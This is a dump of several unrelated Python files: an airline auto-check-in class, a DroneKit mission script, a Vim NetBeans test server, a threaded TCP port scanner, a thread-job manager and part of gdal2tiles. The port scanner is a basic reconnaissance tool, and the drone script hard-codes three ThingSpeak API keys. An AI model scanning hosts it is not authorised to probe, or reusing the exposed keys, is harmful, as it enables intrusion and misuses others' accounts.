        # subscripts it with string keys — it is the reservation JSON dict.
        self.account = account
        self.confirmation_number = confirmation_number
        # Populated by _get_flight_info below.
        self.departure_time = None
        self.departure_airport = None
        self.destination_airport = None
        self._get_flight_info(flight)
        # Schedule check-in on a background thread so construction does not
        # block while waiting for the check-in window.
        x = Thread(target=self._set_check_in)
        x.start()

    def _get_flight_info(self, flight: Dict[str, Any]) -> None:
        """Extract airport names and the UTC departure time from the JSON."""
        self.departure_airport = flight["departureAirport"]["name"]
        self.destination_airport = flight["arrivalAirport"]["name"]
        self.departure_time = self._get_flight_time(flight)

    def _get_flight_time(self, flight: Dict[str, Any]) -> datetime:
        """Return the departure time as a naive datetime in UTC."""
        flight_date = f"{flight['departureDate']} {flight['departureTime']}"
        departure_airport_code = flight['departureAirport']['code']
        airport_timezone = self._get_airport_timezone(departure_airport_code)
        flight_time = self._convert_to_utc(flight_date, airport_timezone)
        return flight_time

    def _get_airport_timezone(self, airport_code: str) -> Any:
        """Look up the departure airport's timezone via the OpenFlights API."""
        airport_info = requests.post("https://openflights.org/php/apsearch.php", data={"iata": airport_code})
        airport_timezone = pytz.timezone(airport_info.json()['airports'][0]['tz_id'])
        return airport_timezone

    def _convert_to_utc(self, flight_date: str, airport_timezone: Any) -> datetime:
        """Convert a local 'YYYY-MM-DD HH:MM' string to a naive UTC datetime."""
        flight_date = datetime.strptime(flight_date, "%Y-%m-%d %H:%M")
        flight_time = airport_timezone.localize(flight_date)
        # tzinfo is stripped so comparisons against datetime.utcnow() work.
        utc_time = flight_time.astimezone(pytz.utc).replace(tzinfo=None)
        return utc_time

    def _set_check_in(self) -> None:
        """Sleep until the check-in window opens, then check in.

        Runs on the background thread started in __init__.
        """
        # Starts to check in five seconds early in case the Southwest server is ahead of your server
        checkin_time = self.departure_time - timedelta(days=1, seconds=5)
        current_time = datetime.utcnow()
        if checkin_time > current_time:
            print(f"Scheduling checkin to flight from '{self.departure_airport}' to '{self.destination_airport}' "
                  f"for {self.account.first_name} {self.account.last_name} at {checkin_time} UTC\n")
            # Refresh headers 10 minutes before to make sure they are valid
            sleep_time = (checkin_time - current_time - timedelta(minutes=10)).total_seconds()
            # Only try to refresh the headers if the checkin is more than ten minutes away
            if sleep_time > 0:
                time.sleep(sleep_time)
                # Check if the check in was started manually or from logging in
                # To-Do: Make one function to retrieve headers
                if self.account.username is None:
                    self.account.get_checkin_info(self.confirmation_number)
                else:
                    self.account.get_flights()
                current_time = datetime.utcnow()
            sleep_time = (checkin_time - current_time).total_seconds()
            time.sleep(sleep_time)
        self._check_in()
        # De-register this flight once the check-in has been performed.
        self.account.flights.remove(self)

    def _check_in(self) -> None:
        """Perform the two-step check-in (GET reservation, POST check-in)."""
        print(f"Checking in to flight from '{self.departure_airport}' to '{self.destination_airport}' "
              f"for {self.account.first_name} {self.account.last_name}\n")
        info = {"first-name": self.account.first_name, "last-name": self.account.last_name}
        site = CHECKIN_URL + self.confirmation_number
        response = make_request("GET", site, self.account, info)
        # The GET response carries the link and body to POST for check-in.
        info = response['checkInViewReservationPage']['_links']['checkIn']
        site = f"mobile-air-operations{info['href']}"
        reservation = make_request("POST", site, self.account, info['body'])
        self._print_results(reservation['checkInConfirmationPage'])

    def _print_results(self, boarding_pass: Dict[str, Any]) -> None:
        """Print each passenger's boarding group/position from the response."""
        print(f"Successfully checked in to flight from '{self.departure_airport}' to '{self.destination_airport}'!")
        for flight in boarding_pass['flights']:
            for passenger in flight['passengers']:
                print(f"{passenger['name']} got {passenger['boardingGroup']}{passenger['boardingPosition']}!")
        print()
|
mission_basic.py | from __future__ import print_function
from dronekit import connect, VehicleMode, LocationGlobalRelative, LocationGlobal, Command
import time
import math
from pymavlink import mavutil
import urllib
import re
from bs4 import BeautifulSoup
import threading
# Set up option parsing to get the connection string.
import argparse
parser = argparse.ArgumentParser(description='Demonstrates basic mission operations.')
parser.add_argument('--connect',
                    help="vehicle connection target string. If not specified, SITL automatically started and used.")
args = parser.parse_args()

connection_string = args.connect
sitl = None

# Start SITL (software-in-the-loop simulator) if no connection string specified.
if not connection_string:
    import dronekit_sitl
    sitl = dronekit_sitl.start_default()
    connection_string = sitl.connection_string()

# Connect to the Vehicle; wait_ready blocks until parameters are downloaded.
print('Connecting to vehicle on: %s' % connection_string)
vehicle = connect(connection_string, wait_ready=True)
def get_location_metres(original_location, dNorth, dEast):
    """
    Return a LocationGlobal offset `dNorth`/`dEast` metres from
    `original_location`, keeping the same `alt` value.

    Useful for specifying positions relative to the current vehicle
    position. Uses a flat-earth approximation: relatively accurate over
    small distances (10m within 1km) except close to the poles. See:
    http://gis.stackexchange.com/questions/2951/algorithm-for-offsetting-a-latitude-longitude-by-some-amount-of-meters
    """
    earth_radius = 6378137.0  # radius of "spherical" earth, metres
    # Coordinate offsets in radians; a degree of longitude shrinks with
    # cos(latitude).
    lat_offset_rad = dNorth / earth_radius
    lon_offset_rad = dEast / (earth_radius * math.cos(math.pi * original_location.lat / 180))
    # Convert back to decimal degrees.
    new_lat = original_location.lat + (lat_offset_rad * 180 / math.pi)
    new_lon = original_location.lon + (lon_offset_rad * 180 / math.pi)
    return LocationGlobal(new_lat, new_lon, original_location.alt)
def location():
    # Telemetry uplink: forever POST the vehicle's lat/lon/alt to three
    # ThingSpeak channels (one write API key per field).
    # NOTE(review): `urllib.urlopen` exists only on Python 2; under
    # Python 3 this needs urllib.request.urlopen — confirm the target
    # interpreter for this script.
    # NOTE(review): the loop has no sleep, so it hits the API as fast as
    # the network allows — likely to exceed ThingSpeak rate limits.
    while (True):
        data1=urllib.urlopen("https://api.thingspeak.com/update?api_key=FY75NMA95F11M8OA&field1="+ str(vehicle.location.global_relative_frame.lat));
        print (data1);
        print (vehicle.location.global_relative_frame.lat);
        data2=urllib.urlopen("https://api.thingspeak.com/update?api_key=U6MA881OO5AM461D&field1="+ str(vehicle.location.global_relative_frame.lon));
        print (data2);
        print (vehicle.location.global_relative_frame.lon);
        data3=urllib.urlopen("https://api.thingspeak.com/update?api_key=N006A2QTZGIN5H6M&field1="+ str(vehicle.location.global_relative_frame.alt));
        print (data3);
        print (vehicle.location.global_relative_frame.alt);

# Start the telemetry uplink on a background thread (runs forever).
threading.Thread(target=location).start()
def get_distance_metres(aLocation1, aLocation2):
    """
    Return the approximate ground distance in metres between two
    LocationGlobal objects.

    Equirectangular approximation taken from the ArduPilot test code;
    it is not accurate over large distances or close to the earth's
    poles:
    https://github.com/diydrones/ardupilot/blob/master/Tools/autotest/common.py
    """
    delta_lat = aLocation2.lat - aLocation1.lat
    delta_lon = aLocation2.lon - aLocation1.lon
    # 1.113195e5 is the number of metres per degree of latitude.
    return math.sqrt(delta_lat ** 2 + delta_lon ** 2) * 1.113195e5
def distance_to_current_waypoint():
    """
    Gets distance in metres to the current waypoint.
    It returns None for the first waypoint (Home location).
    """
    nextwaypoint = vehicle.commands.next
    if nextwaypoint==0:
        return None
    missionitem=vehicle.commands[nextwaypoint-1] #commands are zero indexed
    # Mission items store latitude/longitude/altitude in the x/y/z fields.
    lat = missionitem.x
    lon = missionitem.y
    alt = missionitem.z
    targetWaypointLocation = LocationGlobalRelative(lat,lon,alt)
    distancetopoint = get_distance_metres(vehicle.location.global_frame, targetWaypointLocation)
    return distancetopoint
def download_mission():
    """
    Download the current mission from the vehicle.

    Required so that vehicle.commands reflects the actual mission state
    before reading or modifying it.
    """
    cmds = vehicle.commands
    cmds.download()
    cmds.wait_ready() # wait until download is complete.
def adds_square_mission(aLocation, aSize):
    """
    Adds a takeoff command and four waypoint commands to the current mission.
    The waypoints are positioned to form a square of side length 2*aSize around the specified LocationGlobal (aLocation).

    The function assumes vehicle.commands matches the vehicle mission state
    (you must have called download at least once in the session and after clearing the mission)
    """
    cmds = vehicle.commands

    print(" Clear any existing commands")
    cmds.clear()

    print(" Define/add new commands.")
    # Add new commands. The meaning/order of the parameters is documented in the Command class.

    # Add MAV_CMD_NAV_TAKEOFF command. This is ignored if the vehicle is already in the air.
    cmds.add(Command( 0, 0, 0, mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT, mavutil.mavlink.MAV_CMD_NAV_TAKEOFF, 0, 0, 0, 0, 0, 0, 0, 0, 10))

    # Define the four MAV_CMD_NAV_WAYPOINT locations (corners of the square)
    # and add the commands; altitudes step 11..14 m so progress is visible.
    point1 = get_location_metres(aLocation, aSize, -aSize)
    point2 = get_location_metres(aLocation, aSize, aSize)
    point3 = get_location_metres(aLocation, -aSize, aSize)
    point4 = get_location_metres(aLocation, -aSize, -aSize)
    cmds.add(Command( 0, 0, 0, mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT, mavutil.mavlink.MAV_CMD_NAV_WAYPOINT, 0, 0, 0, 0, 0, 0, point1.lat, point1.lon, 11))
    cmds.add(Command( 0, 0, 0, mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT, mavutil.mavlink.MAV_CMD_NAV_WAYPOINT, 0, 0, 0, 0, 0, 0, point2.lat, point2.lon, 12))
    cmds.add(Command( 0, 0, 0, mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT, mavutil.mavlink.MAV_CMD_NAV_WAYPOINT, 0, 0, 0, 0, 0, 0, point3.lat, point3.lon, 13))
    cmds.add(Command( 0, 0, 0, mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT, mavutil.mavlink.MAV_CMD_NAV_WAYPOINT, 0, 0, 0, 0, 0, 0, point4.lat, point4.lon, 14))
    # add dummy waypoint "5" at point 4 (lets us know when have reached destination)
    cmds.add(Command( 0, 0, 0, mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT, mavutil.mavlink.MAV_CMD_NAV_WAYPOINT, 0, 0, 0, 0, 0, 0, point4.lat, point4.lon, 14))

    print(" Upload new commands to vehicle")
    cmds.upload()
def arm_and_takeoff(aTargetAltitude):
    """
    Arms vehicle and fly to aTargetAltitude.

    Blocks until the vehicle is armable, armed, and within 95% of the
    target altitude.
    """
    print("Basic pre-arm checks")
    # Don't let the user try to arm until autopilot is ready
    while not vehicle.is_armable:
        print(" Waiting for vehicle to initialise...")
        time.sleep(1)

    print("Arming motors")
    # Copter should arm in GUIDED mode
    vehicle.mode = VehicleMode("GUIDED")
    vehicle.armed = True

    while not vehicle.armed:
        print(" Waiting for arming...")
        time.sleep(1)

    print("Taking off!")
    vehicle.simple_takeoff(aTargetAltitude) # Take off to target altitude

    # Wait until the vehicle reaches a safe height before processing the goto (otherwise the command
    # after Vehicle.simple_takeoff will execute immediately).
    while True:
        print(" Altitude: ", vehicle.location.global_relative_frame.alt)
        if vehicle.location.global_relative_frame.alt>=aTargetAltitude*0.95: #Trigger just below target alt.
            print("Reached target altitude")
            break
        time.sleep(1)
# --- Main mission sequence: build the mission, take off, fly it, RTL ---
print('Create a new mission (for current location)')
adds_square_mission(vehicle.location.global_frame,50)

# From Copter 3.3 you will be able to take off using a mission item. Plane must take off using a mission item (currently).
arm_and_takeoff(10)

print("Starting mission")
# Reset mission set to first (0) waypoint
vehicle.commands.next=0

# Set mode to AUTO to start mission
vehicle.mode = VehicleMode("AUTO")

# Monitor mission.
# Demonstrates getting and setting the command number
# Uses distance_to_current_waypoint(), a convenience function for finding the
# distance to the next waypoint.
while True:
    nextwaypoint=vehicle.commands.next
    print('Distance to waypoint (%s): %s' % (nextwaypoint, distance_to_current_waypoint()))
    if nextwaypoint==3: #Skip to next waypoint
        print('Skipping to Waypoint 5 when reach waypoint 3')
        vehicle.commands.next = 5
    if nextwaypoint==5: #Dummy waypoint - as soon as we reach waypoint 4 this is true and we exit.
        print("Exit 'standard' mission when start heading to final waypoint (5)")
        break;
    time.sleep(1)

print('Return to launch')
vehicle.mode = VehicleMode("RTL")

# Close vehicle object before exiting script
print("Close vehicle object")
vehicle.close()

# Shut down simulator if it was started.
if sitl is not None:
    sitl.stop()
|
test_netbeans.py | #!/usr/bin/python
#
# Server that will communicate with Vim through the netbeans interface.
# Used by test_netbeans.vim.
#
# This requires Python 2.6 or later.
from __future__ import print_function
import socket
import sys
import time
import threading
try:
# Python 3
import socketserver
except ImportError:
# Python 2
import SocketServer as socketserver
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
    """Handles one NetBeans connection from Vim.

    Every received message is appended to the "Xnetbeans" file so the Vim
    test can inspect the traffic; a couple of messages trigger replies.
    """

    def handle(self):
        print("=== socket opened ===")
        while True:
            try:
                received = self.request.recv(4096).decode('utf-8')
            except socket.error:
                print("=== socket error ===")
                break
            except IOError:
                print("=== socket closed ===")
                break
            # An empty read means the peer closed the connection.
            if received == '':
                print("=== socket closed ===")
                break
            print("received: {0}".format(received))

            # Write the received line into the file, so that the test can check
            # what happened.
            with open("Xnetbeans", "a") as myfile:
                myfile.write(received)

            response = ''
            if received.find('README.txt') > 0:
                # Vim opened the test buffer: assign it a buffer number and
                # position the cursor.
                name = received.split('"')[1]
                response = '5:putBufferNumber!33 "' + name + '"\n'
                response += '5:setDot!1 3/19\n'
            elif received.find('disconnect') > 0:
                # we're done
                self.server.shutdown()
                return

            if len(response) > 0:
                self.request.sendall(response.encode('utf-8'))
                # Write the response into the file, so that the test knows
                # the command was sent.
                with open("Xnetbeans", "a") as myfile:
                    myfile.write('send: ' + response)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """TCP server that handles each connection in its own thread."""
    pass
def writePortInFile(port):
    """Write the server's port number into "Xportnr" so the Vim test can
    find and connect to this NetBeans server."""
    # Context manager guarantees the file is closed even if write() fails
    # (original opened/closed manually with no error handling).
    with open("Xportnr", "w") as f:
        f.write("{0}".format(port))
if __name__ == "__main__":
    # Port 0 asks the OS for any free port.
    HOST, PORT = "localhost", 0
    server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
    ip, port = server.server_address

    # Start a thread with the server. That thread will then start a new thread
    # for each connection.
    server_thread = threading.Thread(target=server.serve_forever)
    server_thread.start()

    writePortInFile(port)

    print("Listening on port {0}".format(port))

    # Main thread terminates, but the server continues running
    # until server.shutdown() is called.
    try:
        # Thread.isAlive() was removed in Python 3.9; is_alive() has existed
        # since Python 2.6, so this stays compatible with both lines.
        while server_thread.is_alive():
            server_thread.join(1)
    except (KeyboardInterrupt, SystemExit):
        server.shutdown()
|
portscanner.py | # This script runs on Python 3
import socket, threading
import sys
import logging
def TCP_connect(ip, port_number, delay, output):
    """Probe one TCP port and record the result in `output`.

    Args:
        ip: target host (IP address or name).
        port_number: TCP port to probe; also used as the `output` key.
        delay: connection timeout in seconds.
        output: dict to record into — 'Listening' on success, '' otherwise.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.settimeout(delay)
    try:
        sock.connect((ip, port_number))
        output[port_number] = 'Listening'
    except OSError:
        # Refused / timed out / unreachable -> port is not listening.
        # (OSError covers socket.error and socket.timeout; the original
        # bare `except:` also swallowed KeyboardInterrupt etc.)
        output[port_number] = ''
    finally:
        # Original leaked the socket; always release the file descriptor.
        sock.close()
def scan_ports(host_ip, delay, num_ports=500):
    """Concurrently probe TCP ports [0, num_ports) on `host_ip` and print
    the listening ones in ascending order.

    Args:
        host_ip: target host (IP address or name).
        delay: per-connection timeout in seconds.
        num_ports: how many ports to scan starting at 0. Defaults to 500,
            matching the previous hard-coded behaviour.
    """
    output = {}  # port -> 'Listening' or '' (filled in by TCP_connect)
    # One thread per port so slow/filtered ports do not serialize the scan.
    logging.debug('appending threads')
    threads = [
        threading.Thread(target=TCP_connect, args=(host_ip, port, delay, output))
        for port in range(num_ports)
    ]
    logging.debug('finished appending')
    for thread in threads:
        try:
            logging.debug('starting thread %s', thread)
            thread.start()
        except RuntimeError:
            print("Run time error:", sys.exc_info()[0])
            raise
    # Block until every probe completes.
    for thread in threads:
        thread.join()
    # Printing listening ports from small to large.
    for port in range(num_ports):
        if output[port] == 'Listening':
            print(str(port) + ': ' + output[port])
# Module-wide logging setup: DEBUG level, thread name in every record so
# the per-port scanner threads can be told apart.
logging.basicConfig(
    level=logging.DEBUG,
    format='[%(levelname)s] (%(threadName)-10s) %(message)s',)
def run(target):
    """Scan `target` after prompting the user for the socket timeout."""
    timeout = int(input("How many seconds the socket is going to wait until timeout: "))
    print(target)
    scan_ports(target, timeout)
def main():
    """Interactively prompt for a host and timeout, then scan it."""
    target_ip = input("Enter host IP: ")
    timeout = int(input("How many seconds the socket is going to wait until timeout: "))
    scan_ports(target_ip, timeout)
if __name__ == "__main__":
    # Allow running the scanner directly as a script.
    main()
|
jobs.py | #!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import os
import sys
import ctypes
import threading
from core.exceptions import exceptions
from core.formatter import formatter
from core.badges import badges
from core.storage import storage
from core.modules import modules
class jobs():
    """Tracks and controls background jobs (daemon threads) started by
    modules.

    Job records are kept in persistent storage under the "jobs" key as
    {job_id: {'job_name', 'module_name', 'job_process'}}.
    """

    def __init__(self):
        self.exceptions = exceptions()
        self.formatter = formatter()
        self.badges = badges()
        self.storage = storage()
        self.modules = modules()
        # Thread created by the most recent start_job() call.
        self.job_process = None

    def stop_dead(self):
        """Remove records of jobs whose threads have already finished."""
        jobs = self.storage.get("jobs")
        if jobs:
            # Iterate over a copy of the keys: delete_job mutates storage.
            for job_id in list(jobs):
                if not jobs[job_id]['job_process'].is_alive():
                    self.delete_job(job_id)

    def check_jobs(self):
        """Return True when there are NO registered jobs, False otherwise."""
        if not self.storage.get("jobs"):
            return True
        return False

    def check_module_job(self, module_name):
        """Return True if any registered job belongs to `module_name`."""
        jobs = self.storage.get("jobs")
        if jobs:
            for job_id in jobs.keys():
                if jobs[job_id]['module_name'] == module_name:
                    return True
        return False

    def exit_jobs(self):
        """Confirm exit while jobs are running, stopping them if agreed.

        Returns:
            True when it is safe to exit, False to abort the exit.
        """
        if self.check_jobs():
            return True
        self.badges.output_warning("You have some running jobs.")
        if self.badges.input_question("Exit anyway? [y/N] ").lower() in ['yes', 'y']:
            self.badges.output_process("Stopping all jobs...")
            self.stop_all_jobs()
            return True
        return False

    def stop_all_jobs(self):
        """Stop and delete every registered job."""
        if not self.check_jobs():
            for job_id in list(self.storage.get("jobs").keys()):
                self.delete_job(job_id)

    def stop_job(self, job):
        """Forcefully stop a thread by injecting SystemExit into it.

        Raises:
            GlobalException: if the interpreter rejects the injection.
        """
        if job.is_alive():
            exc = ctypes.py_object(SystemExit)
            res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(job.ident), exc)
            if res == 0:
                # Thread id was not recognised by the interpreter.
                raise self.exceptions.GlobalException
            if res > 1:
                # Affected more than one thread: undo the injection and fail.
                ctypes.pythonapi.PyThreadState_SetAsyncExc(job.ident, None)
                raise self.exceptions.GlobalException

    def start_job(self, job_function, job_arguments):
        """Run `job_function(*job_arguments)` on a new daemon thread."""
        self.job_process = threading.Thread(target=job_function, args=job_arguments)
        # `.daemon = True` replaces setDaemon(True), which is deprecated
        # since Python 3.10; behavior is identical.
        self.job_process.daemon = True
        self.job_process.start()

    def delete_job(self, job_id):
        """Stop the job with the given id and remove it from storage."""
        if not self.check_jobs():
            job_id = int(job_id)
            if job_id in list(self.storage.get("jobs").keys()):
                try:
                    self.stop_job(self.storage.get("jobs")[job_id]['job_process'])
                    self.storage.delete_element("jobs", job_id)
                except Exception:
                    self.badges.output_error("Failed to stop job!")
            else:
                self.badges.output_error("Invalid job id!")
        else:
            self.badges.output_error("Invalid job id!")

    def create_job(self, job_name, module_name, job_function, job_arguments=()):
        """Start a job thread and register it; return the new job id."""
        self.start_job(job_function, job_arguments)
        if not self.storage.get("jobs"):
            self.storage.set("jobs", dict())
        # Job ids are dense: next id == current number of jobs.
        job_id = len(self.storage.get("jobs"))
        job_data = {
            job_id: {
                'job_name': job_name,
                'module_name': module_name,
                'job_process': self.job_process
            }
        }
        self.storage.update("jobs", job_data)
        return job_id
|
th.py | import threading as thread
import time
def TheTh(args=(), kwargs=None):
    """Demo thread target: greet, sleep three seconds, say goodbye.

    Args:
        args: accepted for Thread-target compatibility; unused.
        kwargs: unused; defaults to None instead of a shared mutable {}
            literal (mutable default arguments are a Python footgun).
    """
    print('TheTh: hi')
    # current_thread()/.name replace the camelCase currentThread()/getName()
    # accessors, which are deprecated since Python 3.10.
    print('TheTh:', repr(thread.current_thread().name))
    time.sleep(3.0)
    print('TheTh: bye')
def do():
    """Start TheTh on a named thread, outlive it, then join it."""
    theTh = thread.Thread(target=TheTh, name='TheTh', kwargs={})
    # `.name` replaces getName(), deprecated since Python 3.10.
    print('do:', repr(theTh.name))
    theTh.start()
    # Sleep longer than TheTh's 3 s so the join below returns immediately.
    time.sleep(4.0)
    print('do: join')
    theTh.join()
    print('do: thread is dead')
|
gdal2tiles-multiprocess.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# ******************************************************************************
# $Id: gdal2tiles.py 27349 2014-05-16 18:58:51Z rouault $
#
# Project: Google Summer of Code 2007, 2008 (http://code.google.com/soc/)
# Support: BRGM (http://www.brgm.fr)
# Purpose: Convert a raster into TMS (Tile Map Service) tiles in a directory.
# - generate Google Earth metadata (KML SuperOverlay)
# - generate simple HTML viewer based on Google Maps and OpenLayers
# - support of global tiles (Spherical Mercator) for compatibility
# with interactive web maps a la Google Maps
# Author: Klokan Petr Pridal, klokan at klokan dot cz
# Web: http://www.klokan.cz/projects/gdal2tiles/
# GUI: http://www.maptiler.org/
#
###############################################################################
# Copyright (c) 2008, Klokan Petr Pridal
# Copyright (c) 2010-2013, Even Rouault <even dot rouault at mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# ******************************************************************************
# Hacked to make changes to the stacking order.. spruceboy@gmail.com
import sys
try:
from osgeo import gdal
from osgeo import osr
except:
import gdal
print 'You are using "old gen" bindings. gdal2tiles needs "new gen" bindings.'
sys.exit(1)
import os
import math
try:
from PIL import Image
import numpy
import osgeo.gdal_array as gdalarray
except:
# 'antialias' resampling is not available
pass
import multiprocessing
import tempfile
from optparse import OptionParser, OptionGroup
__version__ = '$Id: gdal2tiles.py 27349 2014-05-16 18:58:51Z rouault $'

# Resampling methods accepted by the -r option; 'antialias' additionally
# requires PIL + numpy (see the guarded import above).
resampling_list = (
    'average',
    'near',
    'bilinear',
    'cubic',
    'cubicspline',
    'lanczos',
    'antialias',
)
# Tile profiles and web-viewer flavours accepted on the command line.
profile_list = ('mercator', 'geodetic', 'raster')  # ,'zoomify')
webviewer_list = ('all', 'google', 'openlayers', 'none')

# Shared queue used to hand tile-rendering jobs to worker processes.
queue = multiprocessing.Queue()
# =============================================================================
# =============================================================================
# =============================================================================
__doc__globalmaptiles = \
"""
globalmaptiles.py
Global Map Tiles as defined in Tile Map Service (TMS) Profiles
==============================================================
Functions necessary for generation of global tiles used on the web.
It contains classes implementing coordinate conversions for:
- GlobalMercator (based on EPSG:900913 = EPSG:3785)
for Google Maps, Yahoo Maps, Bing Maps compatible tiles
- GlobalGeodetic (based on EPSG:4326)
for OpenLayers Base Map and Google Earth compatible tiles
More info at:
http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification
http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation
http://msdn.microsoft.com/en-us/library/bb259689.aspx
http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates
Created by Klokan Petr Pridal on 2008-07-03.
Google Summer of Code 2008, project GDAL2Tiles for OSGEO.
In case you use this class in your product, translate it to another language
or find it usefull for your project please let me know.
My email: klokan at klokan dot cz.
I would like to know where it was used.
Class is available under the open-source GDAL license (www.gdal.org).
"""
import math

# Upper bound on zoom levels supported by the tile-addressing maths below.
MAXZOOMLEVEL = 32
class GlobalMercator(object):
    """TMS Global Mercator profile (EPSG:900913 / EPSG:3785).

    Coordinate conversions needed to cut Spherical Mercator tiles that are
    compatible with Google Maps, Bing Maps and Yahoo Maps:

        LatLon <-> Meters <-> Pixels <-> Tile (TMS / Google / QuadTree)

    Pixel and tile coordinates use TMS notation: origin [0,0] in the
    bottom-left corner of the pyramid.  The world extent in meters is
    [-20037508.342789244, 20037508.342789244] on both axes, i.e.
    2 * pi * 6378137 / 2 (half the Earth's circumference on the WGS84
    sphere).  TMS and Google tiles share the same rasters; Google merely
    counts the y axis from the top-left corner, and Microsoft addresses
    tiles by QuadTree key strings.
    """

    def __init__(self, tileSize=256):
        """Initialize the TMS Global Mercator pyramid for a tile edge size."""
        self.tileSize = tileSize
        # 156543.03392804062 m/px at zoom 0 for 256 px tiles.
        self.initialResolution = 2 * math.pi * 6378137 / self.tileSize
        # Half of the Earth's circumference: 20037508.342789244 m.
        self.originShift = 2 * math.pi * 6378137 / 2.0

    def LatLonToMeters(self, lat, lon):
        """Convert WGS84 lat/lon (degrees) to EPSG:900913 XY meters."""
        mx = lon * self.originShift / 180.0
        my = math.log(math.tan((90 + lat) * math.pi / 360.0)) / (math.pi / 180.0)
        my = my * self.originShift / 180.0
        return (mx, my)

    def MetersToLatLon(self, mx, my):
        """Convert EPSG:900913 XY meters to WGS84 (lat, lon) in degrees."""
        lon = mx / self.originShift * 180.0
        lat = my / self.originShift * 180.0
        lat = 180 / math.pi * (2 * math.atan(math.exp(lat * math.pi / 180.0)) - math.pi / 2.0)
        return (lat, lon)

    def PixelsToMeters(self, px, py, zoom):
        """Convert pyramid pixel coordinates at `zoom` to EPSG:900913 meters."""
        res = self.Resolution(zoom)
        return (px * res - self.originShift, py * res - self.originShift)

    def MetersToPixels(self, mx, my, zoom):
        """Convert EPSG:900913 meters to pyramid pixel coordinates at `zoom`."""
        res = self.Resolution(zoom)
        return ((mx + self.originShift) / res, (my + self.originShift) / res)

    def PixelsToTile(self, px, py):
        """Return the (tx, ty) tile covering the given pixel coordinates."""
        size = float(self.tileSize)
        return (int(math.ceil(px / size) - 1), int(math.ceil(py / size) - 1))

    def PixelsToRaster(self, px, py, zoom):
        """Flip pixel coordinates so the origin sits in the top-left corner."""
        mapSize = self.tileSize << zoom
        return (px, mapSize - py)

    def MetersToTile(self, mx, my, zoom):
        """Return the tile containing the given mercator coordinates."""
        px, py = self.MetersToPixels(mx, my, zoom)
        return self.PixelsToTile(px, py)

    def TileBounds(self, tx, ty, zoom):
        """Return (minx, miny, maxx, maxy) bounds of a tile in EPSG:900913."""
        minx, miny = self.PixelsToMeters(tx * self.tileSize,
                                         ty * self.tileSize, zoom)
        maxx, maxy = self.PixelsToMeters((tx + 1) * self.tileSize,
                                         (ty + 1) * self.tileSize, zoom)
        return (minx, miny, maxx, maxy)

    def TileLatLonBounds(self, tx, ty, zoom):
        """Return (minLat, minLon, maxLat, maxLon) of a tile in WGS84."""
        minx, miny, maxx, maxy = self.TileBounds(tx, ty, zoom)
        minLat, minLon = self.MetersToLatLon(minx, miny)
        maxLat, maxLon = self.MetersToLatLon(maxx, maxy)
        return (minLat, minLon, maxLat, maxLon)

    def Resolution(self, zoom):
        """Resolution in meters/pixel at `zoom`, measured at the Equator."""
        return self.initialResolution / 2 ** zoom

    def ZoomForPixelSize(self, pixelSize):
        """Maximal scale-down zoom of the pyramid closest to `pixelSize`."""
        for zoom in range(MAXZOOMLEVEL):
            if pixelSize > self.Resolution(zoom):
                # Never scale up: step back one level (clamped at 0).
                return max(0, zoom - 1)
        # Falls through (implicit None) when pixelSize is finer than every
        # level, matching the historical behaviour.

    def GoogleTile(self, tx, ty, zoom):
        """Convert TMS tile coordinates to Google Tile coordinates."""
        # Google moves the [0,0] origin to the top-left corner of the extent.
        return (tx, 2 ** zoom - 1 - ty)

    def QuadTree(self, tx, ty, zoom):
        """Convert TMS tile coordinates to a Microsoft QuadTree key string."""
        ty = 2 ** zoom - 1 - ty
        digits = []
